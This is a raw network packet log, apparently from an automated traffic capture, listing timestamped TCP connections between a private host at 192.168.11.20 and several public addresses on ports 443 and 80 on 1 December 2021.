Dec 1, 2021 19:25:38.792915106 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.793046951 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.793293953 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.793345928 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.793356895 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.793596029 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.793632984 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.793796062 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.793879986 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.793951035 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.793978930 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.793984890 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.794224024 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.794265032 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.794291973 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.794495106 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.794536114 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.794779062 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.794867039 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.794881105 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.794907093 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.795087099 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.795110941 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.795639992 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.795649052 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.795747995 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.795991898 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.796021938 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.796027899 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.796253920 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.796344042 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.796363115 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.796385050 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.796390057 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.796565056 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.796689034 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.796739101 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.796885014 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.797861099 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.798053980 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.798182011 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.798270941 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.798316002 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.798329115 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.798346043 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.798561096 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.798588037 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.798748970 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.798804045 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.798835039 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.798991919 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.799010038 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.799029112 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.799057007 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.799258947 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.799335003 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.799362898 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.799386024 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.799521923 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.799570084 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.799663067 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.799700022 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.799721956 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.799727917 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.799854040 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.799978018 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.800046921 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.800072908 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.800189018 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.800239086 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.800303936 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.800334930 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.800354004 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.800359964 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.800529003 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.800554991 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.800575972 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.800719976 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.800807953 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.800879955 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.800904989 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.801048040 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.801075935 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.801083088 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.801223040 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.801249981 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.801266909 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.801290989 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.801486015 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.801513910 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.801521063 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.801537037 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.801660061 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.801743984 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.801770926 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.801778078 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.801790953 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.801915884 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.801989079 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.802011967 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.802053928 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:38.802299976 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.802376986 CET	49741	443	192.168.11.20	216.58.212.161
Dec 1, 2021 19:25:38.802412033 CET	443	49741	216.58.212.161	192.168.11.20
Dec 1, 2021 19:25:47.316405058 CET	49698	80	192.168.11.20	93.184.220.29
Dec 1, 2021 19:25:47.324667931 CET	80	49698	93.184.220.29	192.168.11.20
Dec 1, 2021 19:25:47.324793100 CET	49698	80	192.168.11.20	93.184.220.29
Dec 1, 2021 19:25:53.487133980 CET	80	49712	93.184.220.29	192.168.11.20
Dec 1, 2021 19:25:53.487358093 CET	49712	80	192.168.11.20	93.184.220.29
Dec 1, 2021 19:26:09.702117920 CET	49689	80	192.168.11.20	93.184.220.29
Dec 1, 2021 19:26:09.714477062 CET	80	49689	93.184.220.29	192.168.11.20
Dec 1, 2021 19:26:09.714848042 CET	49689	80	192.168.11.20	93.184.220.29
Dec 1, 2021 19:26:12.061036110 CET	49674	80	192.168.11.20	93.184.220.29
Dec 1, 2021 19:26:12.069653988 CET	80	49674	93.184.220.29	192.168.11.20
Dec 1, 2021 19:26:12.069956064 CET	49674	80	192.168.11.20	93.184.220.29
Dec 1, 2021 19:26:21.287504911 CET	49764	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:26:21.287587881 CET	443	49764	142.250.185.206	192.168.11.20
Dec 1, 2021 19:26:21.287811995 CET	49764	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:26:21.310415030 CET	49764	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:26:21.310432911 CET	443	49764	142.250.185.206	192.168.11.20
Dec 1, 2021 19:26:21.341101885 CET	443	49764	142.250.185.206	192.168.11.20
Dec 1, 2021 19:26:21.341234922 CET	49764	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:26:21.341281891 CET	49764	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:26:21.342293978 CET	443	49764	142.250.185.206	192.168.11.20
Dec 1, 2021 19:26:21.342462063 CET	49764	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:26:21.354000092 CET	49764	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:26:21.354250908 CET	443	49764	142.250.185.206	192.168.11.20
Dec 1, 2021 19:26:21.354384899 CET	49764	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:26:21.356560946 CET	49764	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:26:21.399826050 CET	443	49764	142.250.185.206	192.168.11.20
Dec 1, 2021 19:26:21.801753998 CET	443	49764	142.250.185.206	192.168.11.20
Dec 1, 2021 19:26:21.801891088 CET	49764	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:26:21.801939011 CET	443	49764	142.250.185.206	192.168.11.20
Dec 1, 2021 19:26:21.802069902 CET	443	49764	142.250.185.206	192.168.11.20
Dec 1, 2021 19:26:21.802141905 CET	49764	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:26:21.802217960 CET	49764	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:26:21.803740978 CET	49764	443	192.168.11.20	142.250.185.206
Dec 1, 2021 19:26:21.803791046 CET	443	49764	142.250.185.206	192.168.11.20
Dec 1, 2021 19:26:21.902662039 CET	49765	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:21.902688026 CET	443	49765	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:21.902875900 CET	49765	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:21.903217077 CET	49765	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:21.903237104 CET	443	49765	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:21.933001041 CET	443	49765	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:21.933137894 CET	49765	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:21.933154106 CET	49765	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:21.933367014 CET	49765	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:21.935108900 CET	443	49765	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:21.935280085 CET	49765	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:21.935298920 CET	49765	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:21.953289986 CET	49765	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:21.953723907 CET	443	49765	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:21.953948975 CET	49765	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:21.954267979 CET	49765	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:21.995847940 CET	443	49765	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.083621025 CET	443	49765	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.083713055 CET	443	49765	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.083794117 CET	49765	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.083818913 CET	49765	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.083964109 CET	49765	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.102185011 CET	49765	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.102216005 CET	443	49765	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.174137115 CET	49766	443	192.168.11.20	142.250.186.78
Dec 1, 2021 19:26:22.174184084 CET	443	49766	142.250.186.78	192.168.11.20
Dec 1, 2021 19:26:22.174396992 CET	49766	443	192.168.11.20	142.250.186.78
Dec 1, 2021 19:26:22.174665928 CET	49766	443	192.168.11.20	142.250.186.78
Dec 1, 2021 19:26:22.174693108 CET	443	49766	142.250.186.78	192.168.11.20
Dec 1, 2021 19:26:22.209495068 CET	443	49766	142.250.186.78	192.168.11.20
Dec 1, 2021 19:26:22.209645033 CET	49766	443	192.168.11.20	142.250.186.78
Dec 1, 2021 19:26:22.209687948 CET	49766	443	192.168.11.20	142.250.186.78
Dec 1, 2021 19:26:22.212595940 CET	443	49766	142.250.186.78	192.168.11.20
Dec 1, 2021 19:26:22.212805033 CET	49766	443	192.168.11.20	142.250.186.78
Dec 1, 2021 19:26:22.216001987 CET	49766	443	192.168.11.20	142.250.186.78
Dec 1, 2021 19:26:22.216651917 CET	443	49766	142.250.186.78	192.168.11.20
Dec 1, 2021 19:26:22.216789961 CET	49766	443	192.168.11.20	142.250.186.78
Dec 1, 2021 19:26:22.221640110 CET	49766	443	192.168.11.20	142.250.186.78
Dec 1, 2021 19:26:22.263884068 CET	443	49766	142.250.186.78	192.168.11.20
Dec 1, 2021 19:26:22.342830896 CET	443	49766	142.250.186.78	192.168.11.20
Dec 1, 2021 19:26:22.343038082 CET	49766	443	192.168.11.20	142.250.186.78
Dec 1, 2021 19:26:22.343097925 CET	443	49766	142.250.186.78	192.168.11.20
Dec 1, 2021 19:26:22.343269110 CET	49766	443	192.168.11.20	142.250.186.78
Dec 1, 2021 19:26:22.343408108 CET	49766	443	192.168.11.20	142.250.186.78
Dec 1, 2021 19:26:22.343894958 CET	443	49766	142.250.186.78	192.168.11.20
Dec 1, 2021 19:26:22.343983889 CET	443	49766	142.250.186.78	192.168.11.20
Dec 1, 2021 19:26:22.344024897 CET	49766	443	192.168.11.20	142.250.186.78
Dec 1, 2021 19:26:22.344094038 CET	49766	443	192.168.11.20	142.250.186.78
Dec 1, 2021 19:26:22.390516996 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.390603065 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.390820980 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.391093016 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.391139984 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.425750971 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.425916910 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.426156998 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.426356077 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.426400900 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.527472973 CET	49694	80	192.168.11.20	93.184.220.29
Dec 1, 2021 19:26:22.535948992 CET	80	49694	93.184.220.29	192.168.11.20
Dec 1, 2021 19:26:22.536187887 CET	49694	80	192.168.11.20	93.184.220.29
Dec 1, 2021 19:26:22.825783968 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.826109886 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.826174974 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.826514006 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.826785088 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.826958895 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.827080011 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.828268051 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.828408957 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.828433037 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.828552961 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.828943968 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.829085112 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.829180956 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.829623938 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.829946995 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.829984903 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.830147982 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.836148977 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.836467981 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.836505890 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.836530924 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.836673021 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.836699009 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.836719990 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.836899996 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.837165117 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.837755919 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.837783098 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.837811947 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.837980986 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.838017941 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.838217974 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.838516951 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.838732958 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.838771105 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.838954926 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.838980913 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.839230061 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.839271069 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.839478016 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.839500904 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.839653015 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.840023994 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.840229034 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.840261936 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.840579033 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.840629101 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.840873957 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.840904951 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.841099024 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.841425896 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.841599941 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.841633081 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.841945887 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.842103958 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.842279911 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.842312098 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.842509031 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.842746973 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.843394995 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.843415976 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.843439102 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.843610048 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.843642950 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.843967915 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.844002962 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.844233990 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.844266891 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.844461918 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.844682932 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.844882965 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.844924927 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.845122099 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.845292091 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.845537901 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.845571995 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.845710993 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.845966101 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.846343994 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.846376896 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.846699953 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.846782923 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.847002983 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.847028017 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.847050905 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.847230911 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.847273111 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.847548962 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.847579002 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.847738028 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.847778082 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.847994089 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.848036051 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.848054886 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.848346949 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.848380089 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.848683119 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.848917007 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.848937988 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.848962069 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.848979950 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.849109888 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.849273920 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.849288940 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.849315882 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.849481106 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.849505901 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.849526882 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.849694014 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.849729061 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.849967957 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.850049019 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.850085974 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.850281954 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.850302935 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.850320101 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.850529909 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.850753069 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.850960016 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.851003885 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.851185083 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.851311922 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.851344109 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.851351023 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.851547003 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.851588011 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.851766109 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.851787090 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.851829052 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.852072954 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.852102995 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.852123022 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.852425098 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.852466106 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.852648020 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.852665901 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.852693081 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.852919102 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.852940083 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.852967024 CET	443	49767	142.250.185.161	192.168.11.20
